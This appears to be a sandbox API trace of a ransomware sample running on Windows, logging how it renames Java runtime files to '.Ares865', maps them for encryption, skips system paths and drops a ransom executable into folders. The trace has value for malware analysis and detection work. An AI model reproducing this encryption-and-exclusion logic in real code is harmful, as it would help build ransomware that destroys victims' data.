1 [0132.583] lstrlenW (lpString="dbv") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="dbv") returned 1 [0132.583] lstrlenW (lpString="dbx") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="dbx") returned 1 [0132.583] lstrlenW (lpString="dcb") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="dcb") returned 1 [0132.583] lstrlenW (lpString="dct") returned 3 [0132.584] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.Ares865") returned 58 [0132.584] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar.ares865"), dwFlags=0x1) returned 1 [0132.586] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.586] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2450112) returned 1 [0132.587] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.587] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.587] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.588] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2565c0, lpName=0x0) returned 0x170 [0132.590] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x565c0) returned 0x420000 [0132.785] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.786] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.786] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.799] lstrcpyW (in: lpString1=0x2cce44a, lpString2="rt.jar" | out: lpString1="rt.jar") returned="rt.jar" [0132.799] lstrlenW (lpString="rt.jar") returned 6 [0132.799] lstrlenW (lpString="Ares865") returned 7 [0132.799] lstrlenW (lpString=".dll") returned 4 [0132.799] lstrcmpiW (lpString1="rt.jar", lpString2=".dll") returned 1 [0132.799] lstrlenW (lpString=".lnk") returned 4 [0132.799] lstrcmpiW (lpString1="rt.jar", lpString2=".lnk") returned 1 [0132.799] lstrlenW (lpString=".ini") returned 4 [0132.799] lstrcmpiW (lpString1="rt.jar", lpString2=".ini") returned 1 [0132.799] lstrlenW (lpString=".sys") returned 4 [0132.799] lstrcmpiW (lpString1="rt.jar", lpString2=".sys") returned 1 [0132.799] lstrlenW (lpString="rt.jar") returned 6 [0132.799] lstrlenW (lpString="bak") returned 3 [0132.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.Ares865") returned 51 [0132.799] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar.ares865"), dwFlags=0x1) returned 1 [0132.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.803] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51530798) returned 1 [0132.803] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.804] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.804] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.804] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3124f30, lpName=0x0) returned 0x170 [0132.805] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x3000000, dwNumberOfBytesToMap=0x124f30) returned 0x3030000 [0132.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.961] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.961] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.981] lstrcpyW (in: lpString1=0x2cce44a, lpString2="security" | out: lpString1="security") returned="security" [0132.981] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0132.981] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5c) returned 0x2f2100 [0132.981] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0132.981] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744e3080, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744e3080, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0132.981] lstrcmpiW (lpString1="sound.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0132.981] lstrcmpiW (lpString1="sound.properties", lpString2="aoldtz.exe") returned 1 [0132.981] lstrcmpiW (lpString1="sound.properties", lpString2=".") returned 1 [0132.981] lstrcmpiW (lpString1="sound.properties", lpString2="..") returned 1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="windows") returned -1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="bootmgr") returned 1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="temp") returned -1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="pagefile.sys") returned 1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="boot") returned 1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="ids.txt") returned 1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="ntuser.dat") returned 1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="perflogs") returned 1 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2="MSBuild") returned 1 [0132.982] lstrlenW (lpString="sound.properties") returned 16 [0132.982] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\security") returned 45 [0132.982] lstrcpyW (in: lpString1=0x2cce44a, lpString2="sound.properties" | out: lpString1="sound.properties") returned="sound.properties" [0132.982] lstrlenW (lpString="sound.properties") returned 16 [0132.982] lstrlenW (lpString="Ares865") returned 7 [0132.982] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0132.982] lstrlenW (lpString=".dll") returned 4 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2=".dll") returned 1 [0132.982] lstrlenW (lpString=".lnk") returned 4 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2=".lnk") returned 1 [0132.982] lstrlenW (lpString=".ini") returned 4 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2=".ini") returned 1 [0132.982] lstrlenW (lpString=".sys") returned 4 [0132.982] lstrcmpiW (lpString1="sound.properties", lpString2=".sys") returned 1 [0132.982] lstrlenW (lpString="sound.properties") returned 16 [0132.982] lstrlenW (lpString="bak") returned 3 [0132.982] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties.Ares865") returned 61 [0132.982] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties.ares865"), dwFlags=0x1) returned 1 [0132.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.986] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1210) returned 1 [0132.986] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.987] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.987] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.987] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x170 [0132.988] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x190000 [0132.989] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.990] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.990] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.990] lstrcpyW (in: lpString1=0x2cce44a, lpString2="tzmappings" | out: lpString1="tzmappings") returned="tzmappings" [0132.990] lstrlenW (lpString="tzmappings") returned 10 [0132.990] lstrlenW (lpString="Ares865") returned 7 [0132.990] lstrcmpiW (lpString1="appings", lpString2="Ares865") returned -1 [0132.990] lstrlenW (lpString=".dll") returned 4 [0132.990] lstrcmpiW (lpString1="tzmappings", lpString2=".dll") returned 1 [0132.990] lstrlenW (lpString=".lnk") returned 4 [0132.990] lstrcmpiW (lpString1="tzmappings", lpString2=".lnk") returned 1 [0132.991] lstrlenW (lpString=".ini") returned 4 [0132.991] lstrcmpiW (lpString1="tzmappings", lpString2=".ini") returned 1 [0132.991] lstrlenW (lpString=".sys") returned 4 [0132.991] lstrcmpiW (lpString1="tzmappings", lpString2=".sys") returned 1 [0132.991] lstrlenW (lpString="tzmappings") returned 10 [0132.991] lstrlenW (lpString="bak") returned 3 [0132.991] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings.Ares865") returned 55 [0132.991] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings.ares865"), dwFlags=0x1) returned 1 [0132.992] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.992] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8138) returned 1 [0132.993] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.993] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.993] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.994] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22d0, lpName=0x0) returned 0x170 [0132.995] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22d0) returned 0x190000 [0132.996] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.997] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.997] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.998] lstrcpyW (in: lpString1=0x2cce44a, lpString2="zi" | out: lpString1="zi") returned="zi" [0132.998] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0132.998] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed798 [0132.998] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0132.998] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52970f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52970f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zi", cAlternateFileName="")) returned 0 [0132.998] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0132.998] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0132.998] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi" [0132.998] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi" [0132.998] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0132.998] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0132.999] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0133.000] GetLastError () returned 0x0 [0133.001] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0133.001] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52970f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52970f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0133.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0133.002] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.002] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52970f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52970f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.002] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.002] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0133.002] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.002] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.002] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52fb0940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52fb0940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Africa", cAlternateFileName="")) returned 1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="aoldtz.exe") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2=".") returned 1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="..") returned 1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="windows") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="bootmgr") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="temp") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="pagefile.sys") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="boot") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="ids.txt") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="ntuser.dat") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="perflogs") returned -1 [0133.002] lstrcmpiW (lpString1="Africa", lpString2="MSBuild") returned -1 [0133.002] lstrlenW (lpString="Africa") returned 6 [0133.002] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\*") returned 41 [0133.002] lstrcpyW (in: lpString1=0x2cce450, lpString2="Africa" | out: lpString1="Africa") returned="Africa" [0133.002] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0133.002] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f2168 [0133.002] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0133.002] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7452f340, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52cdcf20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52cdcf20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="America", cAlternateFileName="")) returned 1 [0133.002] lstrcmpiW (lpString1="America", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.002] lstrcmpiW (lpString1="America", lpString2="aoldtz.exe") returned -1 [0133.002] lstrcmpiW (lpString1="America", lpString2=".") returned 1 [0133.002] lstrcmpiW (lpString1="America", lpString2="..") returned 1 [0133.003] lstrcmpiW (lpString1="America", lpString2="windows") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="bootmgr") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="temp") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="pagefile.sys") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="boot") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="ids.txt") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="ntuser.dat") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="perflogs") returned -1 [0133.003] lstrcmpiW (lpString1="America", lpString2="MSBuild") returned -1 [0133.003] lstrlenW (lpString="America") returned 7 [0133.003] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa") returned 46 [0133.003] lstrcpyW (in: lpString1=0x2cce450, lpString2="America" | out: lpString1="America") returned="America" [0133.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0133.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f21d0 [0133.003] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0133.003] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52bac420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52bac420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Antarctica", cAlternateFileName="ANTARC~1")) returned 1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="aoldtz.exe") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2=".") returned 1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="..") returned 1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="windows") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="bootmgr") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="temp") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="pagefile.sys") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="boot") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="ids.txt") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="ntuser.dat") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="perflogs") returned -1 [0133.003] lstrcmpiW (lpString1="Antarctica", lpString2="MSBuild") returned -1 [0133.003] lstrlenW (lpString="Antarctica") returned 10 [0133.003] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America") returned 47 [0133.003] lstrcpyW (in: lpString1=0x2cce450, lpString2="Antarctica" | out: lpString1="Antarctica") returned="Antarctica" [0133.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0133.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2d2ef0 [0133.004] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0133.004] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x745c78c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52b862c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52b862c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Asia", cAlternateFileName="")) returned 1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="aoldtz.exe") returned 1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2=".") returned 1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="..") returned 1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="windows") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="bootmgr") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="temp") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="pagefile.sys") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="boot") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="ids.txt") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="ntuser.dat") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="perflogs") returned -1 [0133.004] lstrcmpiW (lpString1="Asia", lpString2="MSBuild") returned -1 [0133.004] lstrlenW (lpString="Asia") returned 4 [0133.004] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica") returned 50 [0133.004] lstrcpyW (in: lpString1=0x2cce450, lpString2="Asia" | out: lpString1="Asia") returned="Asia" [0133.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0133.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f2238 [0133.004] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0133.004] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74613b80, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52b3a000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52b3a000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Atlantic", 